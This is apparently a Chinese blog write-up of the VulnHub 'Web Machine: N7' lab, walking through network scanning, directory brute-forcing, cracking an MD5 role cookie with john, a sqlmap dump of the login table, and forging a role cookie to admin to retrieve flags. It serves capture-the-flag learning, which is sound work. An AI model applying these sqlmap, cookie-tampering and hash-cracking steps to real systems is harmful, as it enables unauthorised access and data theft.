靶机渗透练习101-Web Machine:(N7)

靶机描述

靶机地址:https://www.vulnhub.com/entry/web-machine-n7,756/

Description

Difficulty: Medium

This may work better with VirtualBox rather than VMware

一、搭建靶机环境

攻击机Kali

IP地址:192.168.11.129

靶机

IP地址:192.168.11.131

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

  1. 将下载好的靶机环境,导入 VMware ,设置为NAT模式
  2. Kali设置为NAT模式

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

┌──(root㉿MYsec)-[/home/hirak0]
└─# arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:46:e0:a0, IPv4: 192.168.11.130
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1	00:50:56:c0:00:01	(Unknown)
192.168.11.131	08:00:27:4f:aa:72	(Unknown)
192.168.11.254	00:50:56:fd:34:4b	(Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.836 seconds (139.43 hosts/sec). 3 responded
                                             
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.11.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth1 -r 192.168.11.0/24

方法四、fping -aqg 指定网段

fping -aqg 192.168.11.0/24

方法五、待补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

┌──(root㉿MYsec)-[/home/hirak0]
└─# nmap -A -sV -T4 -p- 192.168.11.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-01 15:46 CST
Nmap scan report for 192.168.11.131
Host is up (0.00088s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.46 ((Debian))
|_http-server-header: Apache/2.4.46 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:4F:AA:72 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.88 ms 192.168.11.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.74 seconds

目前看就开了个80端口

2.2枚举漏洞

2.2.1 80 端口分析

访问:http://192.168.11.131

image-20240401155538645

扫一下目录

┌──(root㉿MYsec)-[/home/hirak0]
└─# gobuster dir -u http://192.168.11.131 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.11.131
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,bak,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1620]
/profile.php          (Status: 200) [Size: 1473]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.11.131/javascript/]
/exploit.html         (Status: 200) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

访问:http://192.168.11.131/exploit.html

image-20240401155625699

查看源代码发现CSRF的提示,同时发现代码中的action写成localhost了,这里需要改成靶机的IP

image-20240401155712356

然后上传webshell

image-20240401160419307

然后发现,,直接回显了flag的一部分

image-20240401160613305

抓包看一下,没有发现上传路径

image-20240401162014147

上网看了一下大佬们的做法,莫名其秒的多了个目录enter_network

这个目录很考验字典强度,目前看,kali自带的字典是没有这个目录的

grep -rni 'enter_network' /usr/share/seclists/Discovery/Web-Contentgrep -rni 'enter_network' /usr/share/seclists/Discovery/Web-Content
grep -rni 'enter_network' /usr/share/wordlists/dirb
grep -rni 'enter_network' /usr/share/wordlists/dirbuster
grep -rni 'enter_network' /usr/share/wordlists/
grep -rni 'enter_network' /usr/share/

作弊一下,,就是打开虚拟机的时候按E进入编辑 GRUB 菜单中的启动选项,修改下面这行

linux  /boot/vmlinuz-5.9.0-kali1-amd64 root=UUID=[...] ro  quiet splash

linux  /boot/vmlinuz-5.9.0-kali1-amd64 root=UUID=[...] rw quiet single init=/bin/bash

image-20240401164310452

使用 CTRL+X 保存更改并启动系统后,我们会看到 /var/www/html 包含一个名为enter_network的目录

image-20240401164401599

得到目录后,继续访问

image-20240401164640018

该页面有个账户密码的表单,抓包测试一下,发现有返回包有个Set-Cookie,这个应该是可以利用的

image-20240401164943825

Set-Cookie: user=JGFyZ29uMmkkdj0xOSRtPTY1NTM2LHQ9NCxwPTEkV2sxVWJUY3pNVkpEYzBkTE4xSkpOUSRCRmtpckJzbU1iQUhCOEpLSXlXSVNPdDdCQ29yU1BQMXc4SExQQUlNZ000; expires=Mon, 01-Apr-2024 11:36:09 GMT; Max-Age=10000; path=/
Set-Cookie: role=MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%253D; expires=Mon, 01-Apr-2024 11:36:09 GMT; 

base64解码后

user=$argon2i$v=19$m=65536,t=4,p=1$VXgub2R2LmxwTVRpaThjNQ$cvselxQfn/MOW2HMgtvMfKSESiCRPOEmeKsdzcUr3D0
role=21232f297a57a5a743894a0e4a801fc3

使用john破解一下role的值

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/101]
└─# echo -n '21232f297a57a5a743894a0e4a801fc3' |john --format=raw-md5 /dev/stdin 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Proceeding with single, rules:Single
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
admin            (?)     
1g 0:00:00:00 DONE 2/3 (2024-04-01 16:53) 100.0g/s 307200p/s 307200c/s 307200C/s chacha..mobydick
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 

成功破解出值为admin

2.2.2 方法一:SQL注入

这里接下用sqlmap跑一下

sqlmap -u "http://192.168.11.131/enter_network/" --data="user=foo&pass=bar&sub=SEND" --dbms=mysql --dump --threads=10 --batch


[17:15:04] [INFO] retrieved: FLAG{N7:KSA_01}
[17:16:18] [INFO] retrieved: administrator
Database: Machine
Table: login
[1 entry]
+--------+-----------------+---------------+
| role   | password        | username      |
+--------+-----------------+---------------+
| admin  | FLAG{N7:KSA_01} | administrator |
+--------+-----------------+---------------+

2.2.3 方法二:CSRF利用

题目开头就提示了CSRF,,那咱们就用一下呗

扫一下目录

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/101]
└─# gobuster dir -u http://192.168.11.131/enter_network -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.11.131/enter_network
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,bak,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 324]
/admin.php            (Status: 200) [Size: 126]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

除了index.php,还有一个admin.php

image-20240401173011219

这里再上面咱们不是搞出来了Set-Cookie嘛,利用起来

image-20240401173136102

把role改成admin发一下包看看

image-20240401173212432

成功拿到flag的另一半

三、总结

这个靶机除了目录扫描那个地方考验字典之外,其他的都比较常规,用户密码表单尝试利用注入,Set-Cookie联想CSRF

1.sqlmap的使用

2.CSRF的利用

posted @ 2024-04-03 20:00  hirak0  阅读(53)  评论(0编辑  收藏  举报